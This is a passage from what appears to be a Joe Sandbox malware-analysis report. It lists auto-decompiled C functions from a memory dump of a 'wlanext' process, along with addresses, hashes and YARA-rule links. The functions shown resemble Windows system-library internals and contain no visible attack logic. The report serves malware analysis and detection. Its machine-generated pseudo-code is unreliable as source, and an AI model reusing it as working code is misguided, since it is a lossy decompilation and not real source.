					L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E035295D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                                  0x03563552
                                  0x0356355a
                                  0x0356355d
                                  0x03563566
                                  0x03563567
                                  0x0356357e
                                  0x0356358f
                                  0x035635a1
                                  0x035635a5
                                  0x0356366b
                                  0x0356366b
                                  0x0356366d
                                  0x03563672
                                  0x03563679
                                  0x03563685
                                  0x0356368d
                                  0x0356369d
                                  0x035636a7
                                  0x035636b8
                                  0x035636c6
                                  0x035636c7
                                  0x035636dc
                                  0x035636e1
                                  0x035636e7
                                  0x035636e9
                                  0x035636e9
                                  0x03563703
                                  0x03563703
                                  0x035635b5
                                  0x035635c0
                                  0x035635c4
                                  0x00000000
                                  0x00000000
                                  0x035635ca
                                  0x035635d7
                                  0x035635e2
                                  0x035635e6
                                  0x035635e8
                                  0x035635f5
                                  0x035635fa
                                  0x03563603
                                  0x03563604
                                  0x03563609
                                  0x0356360a
                                  0x03563612
                                  0x03563613
                                  0x0356361e
                                  0x03563622
                                  0x03563628
                                  0x0356362f
                                  0x0356362f
                                  0x03563636
                                  0x03563638
                                  0x0356363b
                                  0x03563642
                                  0x03563642
                                  0x03563636
                                  0x03563657
                                  0x03563657
                                  0x0356365c
                                  0x03563662
                                  0x03563669
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID: BinaryHash
                                  • API String ID: 2994545307-2202222882
                                  • Opcode ID: 6c58d8d05e456482f1c9ba01e0a4d8f198910725e177ec03b3d0bffabaae1b5e
                                  • Instruction ID: 5e8012199bff0a18f86c438e2474943a4bcd59298c6e81d62bd907b54f0c6322
                                  • Opcode Fuzzy Hash: 6c58d8d05e456482f1c9ba01e0a4d8f198910725e177ec03b3d0bffabaae1b5e
                                  • Instruction Fuzzy Hash: D74155B5D0062D9BDB21DA50DC81FDEB77CBB45714F0145A5EA09AB2A0DB309E888FD4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 035B05AC Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 71%
                                  			E035B05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E035B07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E03529730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E035AA80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E035AA854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E035B1293(_t79, _v40, E035B07DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E03507D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E035A138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                                  0x035b05c5
                                  0x035b05ca
                                  0x035b05d3
                                  0x035b06db
                                  0x035b06db
                                  0x035b06dd
                                  0x035b06e3
                                  0x035b06e3
                                  0x035b05dd
                                  0x035b05e7
                                  0x035b05f6
                                  0x035b0600
                                  0x035b0607
                                  0x035b0610
                                  0x035b0615
                                  0x035b061a
                                  0x035b061c
                                  0x035b061e
                                  0x035b0624
                                  0x035b0625
                                  0x035b0627
                                  0x035b0628
                                  0x035b0631
                                  0x035b0640
                                  0x035b064d
                                  0x035b0654
                                  0x035b0654
                                  0x035b0631
                                  0x035b066d
                                  0x035b0674
                                  0x00000000
                                  0x00000000
                                  0x035b0692
                                  0x035b069e
                                  0x035b06b0
                                  0x035b06a0
                                  0x035b06a9
                                  0x035b06a9
                                  0x035b06b8
                                  0x035b06d6
                                  0x035b06d6
                                  0x00000000

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: `
                                  • API String ID: 0-2679148245
                                  • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                  • Instruction ID: 6e0ecf57b54b3fd972bb50ab6087c09f30f818a6c1bb57551c8bee6bc1dc5ab5
                                  • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                  • Instruction Fuzzy Hash: 4E31F3326007166BE710DE24DC85F9BBBE9BBC4754F084229F9549B2E0D770E905C7D1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03563884 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 72%
                                  			E03563884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E03529650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L03504620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E03529650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                                  0x03563893
                                  0x03563896
                                  0x03563899
                                  0x0356389f
                                  0x035638a0
                                  0x035638a4
                                  0x035638a9
                                  0x035638ac
                                  0x035638ad
                                  0x035638ae
                                  0x035638af
                                  0x035638b1
                                  0x035638b4
                                  0x035638bb
                                  0x035638bc
                                  0x035638bd
                                  0x035638c4
                                  0x035638c8
                                  0x035638ca
                                  0x035638ca
                                  0x035638d5
                                  0x0356393e
                                  0x03563940
                                  0x03563942
                                  0x03563952
                                  0x03563954
                                  0x03563961
                                  0x03563961
                                  0x03563967
                                  0x0356396e
                                  0x0356396e
                                  0x03563947
                                  0x0356394c
                                  0x00000000
                                  0x0356394c
                                  0x035638ea
                                  0x035638ee
                                  0x035638f8
                                  0x035638f9
                                  0x035638ff
                                  0x03563900
                                  0x03563902
                                  0x03563903
                                  0x0356390b
                                  0x0356390f
                                  0x03563950
                                  0x00000000
                                  0x03563950
                                  0x03563915
                                  0x0356391d
                                  0x0356391d
                                  0x03563922
                                  0x03563926
                                  0x00000000
                                  0x03563928
                                  0x0356392b
                                  0x0356392b
                                  0x03563935
                                  0x03563937
                                  0x03563937
                                  0x00000000
                                  0x03563935
                                  0x03563926
                                  0x035638f0
                                  0x00000000

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID: BinaryName
                                  • API String ID: 2994545307-215506332
                                  • Opcode ID: 7e4a9a4b9f9e3ea39be90b2477b49dcfbeb0caa15955830c2c85ab6e2ddebbb2
                                  • Instruction ID: cc78145ea6a90ff9d2fac94690a63ebbb6c7ec580e6c95f710f9d59ea9facf3e
                                  • Opcode Fuzzy Hash: 7e4a9a4b9f9e3ea39be90b2477b49dcfbeb0caa15955830c2c85ab6e2ddebbb2
                                  • Instruction Fuzzy Hash: 2831F63AD0161AAFEB15DE58D945E6BF774FB81720F014169A914AB3B0D7309E00CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0351D294 Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 33%
                                  			E0351D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x35dd360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E03504120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E0352B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E035298D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E035295D0();
					L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                                  0x0351d29c
                                  0x0351d2a6
                                  0x0351d2b1
                                  0x0351d2b5
                                  0x0351d2b6
                                  0x0351d2bc
                                  0x0351d2bd
                                  0x0351d2be
                                  0x0351d2bf
                                  0x0351d2c2
                                  0x0351d2c4
                                  0x0351d2cc
                                  0x0351d384
                                  0x0351d34b
                                  0x0351d34f
                                  0x0351d350
                                  0x0351d351
                                  0x0351d35c
                                  0x0351d35c
                                  0x0351d2d6
                                  0x0351d2da
                                  0x0351d2e1
                                  0x0351d361
                                  0x0351d369
                                  0x0351d36d
                                  0x0351d2e3
                                  0x0351d2e3
                                  0x0351d2e3
                                  0x0351d2e5
                                  0x0351d2ed
                                  0x0351d2f5
                                  0x0351d2fa
                                  0x0351d302
                                  0x0351d303
                                  0x0351d30b
                                  0x0351d30f
                                  0x0351d313
                                  0x0351d318
                                  0x0351d31c
                                  0x0351d320
                                  0x0351d379
                                  0x0351d37d
                                  0x00000000
                                  0x00000000
                                  0x0355affe
                                  0x0355b001
                                  0x0355b011
                                  0x00000000
                                  0x0351d322
                                  0x0351d322
                                  0x0351d330
                                  0x0351d337
                                  0x0351d35d
                                  0x0351d339
                                  0x0351d33f
                                  0x0351d38c
                                  0x0351d38c
                                  0x0351d33f
                                  0x0351d349
                                  0x00000000
                                  0x0351d349

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @
                                  • API String ID: 0-2766056989
                                  • Opcode ID: 65bd2b856a18ead5252762044107ce6fc36bff363ea7529edc23c113b0153a57
                                  • Instruction ID: 4b1e7b197187072690f25280f20e82a08064132c20c789171090ade4030d3279
                                  • Opcode Fuzzy Hash: 65bd2b856a18ead5252762044107ce6fc36bff363ea7529edc23c113b0153a57
                                  • Instruction Fuzzy Hash: A8318BB55083059FD321DF28E98096BBBF8FBC9654F040A2EF99487260D635DD15CBA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 034F1B8F Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 72%
                                  			E034F1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E0352BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E0352A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E0352A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L03504620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                                  0x034f1b8f
                                  0x034f1b9a
                                  0x034f1b9c
                                  0x034f1b9e
                                  0x034f1ba3
                                  0x03547010
                                  0x03547010
                                  0x00000000
                                  0x034f1ba9
                                  0x034f1ba9
                                  0x034f1bae
                                  0x00000000
                                  0x034f1bc5
                                  0x034f1bca
                                  0x034f1bcf
                                  0x034f1bd0
                                  0x034f1bd1
                                  0x034f1bd2
                                  0x034f1bd6
                                  0x034f1bdc
                                  0x034f1be0
                                  0x03546ffc
                                  0x03547000
                                  0x00000000
                                  0x03547006
                                  0x03547009
                                  0x03547009
                                  0x034f1be6
                                  0x034f1bec
                                  0x034f1c0b
                                  0x034f1c0b
                                  0x034f1c0c
                                  0x034f1c11
                                  0x034f1c12
                                  0x034f1c15
                                  0x034f1c1b
                                  0x034f1c1f
                                  0x034f1c31
                                  0x034f1c33
                                  0x03547026
                                  0x03547026
                                  0x034f1c21
                                  0x034f1c24
                                  0x034f1c24
                                  0x034f1bee
                                  0x034f1bee
                                  0x034f1bf2
                                  0x034f1c3a
                                  0x034f1bf4
                                  0x034f1bf4
                                  0x034f1c05
                                  0x034f1c05
                                  0x034f1c09
                                  0x034f1c3e
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x034f1c09
                                  0x034f1bec
                                  0x034f1be0
                                  0x034f1bae
                                  0x034f1c2e

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: WindowsExcludedProcs
                                  • API String ID: 0-3583428290
                                  • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                  • Instruction ID: 7d421aea2da676ab1cc726d314997d07d5945149435eed73b6d26cd2cad37813
                                  • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                  • Instruction Fuzzy Hash: 8921F276501269EFCB21DA569840F6BB7BDFF85B50F0E4866FA148F210DA31DC019BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0350F716 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0350F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                                  0x0350f71d
                                  0x0350f722
                                  0x0350f726
                                  0x03554770
                                  0x0350f765
                                  0x0350f769
                                  0x0350f769
                                  0x0350f732
                                  0x0355477a
                                  0x00000000
                                  0x0355477a
                                  0x0350f738
                                  0x0350f73a
                                  0x0350f73c
                                  0x0350f73f
                                  0x0350f746
                                  0x0350f778
                                  0x0350f7a9
                                  0x0350f7a9
                                  0x0350f754
                                  0x0350f75a
                                  0x0350f75d
                                  0x0350f75f
                                  0x0350f761
                                  0x0350f76f
                                  0x0350f771
                                  0x0350f771
                                  0x0350f76f
                                  0x0350f763
                                  0x00000000
                                  0x0350f763
                                  0x0350f77d
                                  0x0350f7a3
                                  0x0350f7a5
                                  0x00000000
                                  0x0350f7a5
                                  0x0350f77f
                                  0x0350f782
                                  0x0350f784
                                  0x0350f786
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0350f788
                                  0x0350f748
                                  0x0350f74d
                                  0x0350f78d
                                  0x0350f793
                                  0x0350f7b7
                                  0x0350f7bc
                                  0x00000000
                                  0x0350f7bc
                                  0x0350f798
                                  0x00000000
                                  0x00000000
                                  0x0350f79d
                                  0x0350f7b0
                                  0x00000000
                                  0x0350f7b0
                                  0x0350f79f
                                  0x00000000
                                  0x0350f74f
                                  0x0350f74f
                                  0x00000000
                                  0x0350f74f

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Actx
                                  • API String ID: 0-89312691
                                  • Opcode ID: daf1b6332776f094c7a353ef4a041f33639568993d8329d0bc6183bb3bc1a85b
                                  • Instruction ID: b6597abaa1fb8135775732dab92b3bfc977507cb120ae2f19e050cf827a0dbf0
                                  • Opcode Fuzzy Hash: daf1b6332776f094c7a353ef4a041f33639568993d8329d0bc6183bb3bc1a85b
                                  • Instruction Fuzzy Hash: AC11B6353047028BE734CE1DB590736B299BB95624F2C492AE461CB3F1D7B2D8418383
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03598DF1 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 71%
                                  			E03598DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x35c0d50);
				E0353D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E03575720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L0353DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L0353DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E0353D130(_t34, _t39, _t40);
			}





                                  0x03598df1
                                  0x03598df1
                                  0x03598df1
                                  0x03598df1
                                  0x03598df1
                                  0x03598df1
                                  0x03598df3
                                  0x03598df8
                                  0x03598dfd
                                  0x03598e00
                                  0x03598e0e
                                  0x03598e2a
                                  0x03598e36
                                  0x03598e38
                                  0x03598e3c
                                  0x03598e46
                                  0x03598e46
                                  0x03598e36
                                  0x03598e50
                                  0x03598e56
                                  0x03598e59
                                  0x03598e5c
                                  0x03598e60
                                  0x03598e67
                                  0x03598e6d
                                  0x03598e73
                                  0x03598e74
                                  0x03598eb1
                                  0x03598ebd

                                  Strings
                                  • Critical error detected %lx, xrefs: 03598E21
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Critical error detected %lx
                                  • API String ID: 0-802127002
                                  • Opcode ID: a423b8b940e617f72969e7f1406c21bc23b6b8c375869a0bcd95ece51a34d32f
                                  • Instruction ID: 2e6bd0f3dc09cc734ffc21df50aac155ee086a1ab179ceec61c965b495b462f6
                                  • Opcode Fuzzy Hash: a423b8b940e617f72969e7f1406c21bc23b6b8c375869a0bcd95ece51a34d32f
                                  • Instruction Fuzzy Hash: E71175B5D11348DEEF24CFA8A9157DCBBB4BB06315F24425ED429AB3A2C3300602CF15
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0357FF10 Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                  Download Yara Rule
                                  Strings
                                  • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0357FF60
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                  • API String ID: 0-1911121157
                                  • Opcode ID: 0badd591ad2bec10f3ea493cc9ab9d9660ccfd886c1caa314f2ceb19b48ff0f0
                                  • Instruction ID: a650529154561c889c0a5f9616d9e61700c4ff495351d621b39d36d4f720d9e7
                                  • Opcode Fuzzy Hash: 0badd591ad2bec10f3ea493cc9ab9d9660ccfd886c1caa314f2ceb19b48ff0f0
                                  • Instruction Fuzzy Hash: E3110075910684EFDB22EF90E848F98BBB2FF49715F188444E4086B2B1CB399951DB60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 035B5BA5 Relevance: .6, Instructions: 592COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 88%
                                  			E035B5BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
